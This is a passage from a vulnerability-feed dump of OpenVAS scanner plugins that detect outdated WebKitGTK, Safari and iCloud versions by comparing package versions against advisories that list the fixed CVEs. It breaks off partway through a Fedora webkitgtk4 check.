(C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852337\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2019-6212\", \"CVE-2019-6215\", \"CVE-2019-6216\", \"CVE-2019-6217\",\n \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\",\n \"CVE-2019-6234\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-03-09 04:08:17 +0100 (Sat, 09 Mar 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:0309-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:0309-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-03/msg00015.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:0309-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.22.6 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-6212: Fixed multiple memory corruption vulnerabilities which\n could allow arbitrary code execution during the processing\n of special crafted web-content.\n\n - CVE-2019-6215: Fixed a type confusion vulnerability which could allow\n arbitrary code execution during the processing\n of special crafted web-content.\n\n - CVE-2019-6216: Fixed multiple memory corruption vulnerabilities which\n could allow arbitrary code execution during the processing\n of special crafted web-content.\n\n - CVE-2019-6217: Fixed multiple memory corruption vulnerabilities which\n could allow arbitrary code execution during the processing\n of special crafted web-content.\n\n - CVE-2019-6226: Fixed multiple memory corruption vulnerabilities which\n could allow arbitrary code execution during the processing\n of special crafted web-content.\n\n - CVE-2019-6227: Fixed a memory corruption vulnerability which could allow\n arbitrary code execution during the processing\n of special crafted web-content.\n\n - CVE-2019-6229: Fixed a logic issue by improving validation which could\n allow arbitrary code execution during the processing\n of special crafted web-content.\n\n - CVE-2019-6233: Fixed a memory corruption vulnerability which could allow\n arbitrary code execution during the processing\n of special crafted web-content.\n\n - CVE-2019-6234: Fixed a memory corruption vulnerability which could allow\n arbitrary code execution during the processing\n of special crafted web-content.\n\n Other issues addressed:\n\n - Update to version 2.22.6 (bsc#1124937).\n\n - Kinetic scrolling slow down smoothly when reaching the ends of pages,\n instead of abruptly, to better match the GTK+ behaviour.\n\n - Fixed Web inspector magnifier under Wayland.\n\n - Fixed garbled rendering of some websites (e.g. YouTube) while scrolling\n under X11.\n\n - Fixed several crashes, race conditions, and rendering issues.\n\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2019-309=1\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser\", rpm:\"webkit2gtk3-minibrowser~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-minibrowser-debuginfo\", rpm:\"webkit2gtk3-minibrowser-debuginfo~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.22.6~21.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:05", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-01-23T00:00:00", "type": "openvas", "title": "Apple Safari Security Updates( HT209449 )", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6217", "CVE-2019-6233", "CVE-2019-6229", "CVE-2019-6227", "CVE-2019-6228", "CVE-2019-6226", "CVE-2019-6234", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6212"], "modified": "2019-05-22T00:00:00", "id": "OPENVAS:1361412562310814820", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814820", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates(HT209449)\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814820\");\n script_version(\"2019-05-22T13:05:41+0000\");\n script_cve_id(\"CVE-2019-6228\", \"CVE-2019-6215\", \"CVE-2019-6212\", \"CVE-2019-6216\",\n \"CVE-2019-6217\", \"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6233\",\n \"CVE-2019-6234\", \"CVE-2019-6229\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:05:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-23 12:46:20 +0530 (Wed, 23 Jan 2019)\");\n script_name(\"Apple Safari Security Updates( HT209449 )\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A cross-site scripting issue.\n\n - A type confusion issue, multiple memory corruption issues exists in\n memory handling.\n\n - A logic issue exists in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and conduct cross site scripting by\n processing maliciously crafted web content.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 12.0.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 12.0.3 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209449\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\nsafPath = infos['location'];\n\nif(version_is_less(version:safVer, test_version:\"12.0.3\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"12.0.3\", install_path:safPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-24T17:04:23", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-01-23T00:00:00", "type": "openvas", "title": "Apple iCloud Security Updates (HT209451) - Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-20346", "CVE-2019-6217", "CVE-2018-20505", "CVE-2019-6233", "CVE-2019-6229", "CVE-2019-6227", "CVE-2019-6226", "CVE-2018-20506", "CVE-2019-6234", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6212"], "modified": "2020-03-23T00:00:00", "id": "OPENVAS:1361412562310814821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814821", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates (HT209451) - Windows\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814821\");\n script_version(\"2020-03-23T08:27:10+0000\");\n script_cve_id(\"CVE-2018-20346\", \"CVE-2018-20505\", \"CVE-2018-20506\", \"CVE-2019-6215\",\n \"CVE-2019-6212\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\",\n \"CVE-2019-6227\", \"CVE-2019-6233\", \"CVE-2019-6234\", \"CVE-2019-6229\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-23 08:27:10 +0000 (Mon, 23 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-01-23 13:00:19 +0530 (Wed, 23 Jan 2019)\");\n script_name(\"Apple iCloud Security Updates (HT209451) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption issues exists in input validation and memory\n handling.\n\n - A type confusion issue and\n\n - A logic issue exists.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and conduct cross site scripting by\n processing maliciously crafted web content.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.10 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Update to Apple iCloud 7.10 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209451\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\n# 7.10 => 7.10.0.9\nif(version_is_less(version:vers, test_version:\"7.10.0.9\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"7.10\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:30", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873226", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873226", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9d572cc64a_webkitgtk4_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873226\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-08 07:36:34 +0200 (Tue, 08 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-9d572cc64a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9d572cc64a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VIXDC655D7574NMXWPNXAFDI2JHBTWZR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-04T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873200", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_73d6a0dfbb_webkitgtk4_fc25.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873200\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:46:47 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-73d6a0dfbb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YOV6OOFLOHZALSKLNVHTQVXB43SXE5LW\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.6~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-08-04T00:00:00", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2019-03-26T00:00:00", "id": "OPENVAS:1361412562310873180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_24bddb96b5_webkitgtk4_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873180\");\n script_version(\"2019-03-26T08:16:24+0000\");\n script_tag(name:\"last_modification\", value:\"2019-03-26 08:16:24 +0000 (Tue, 26 Mar 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:40 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\",\n \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-24bddb96b5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5WQG4TVFXCPDMB3M6X46ISBMRZAHJZ43\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 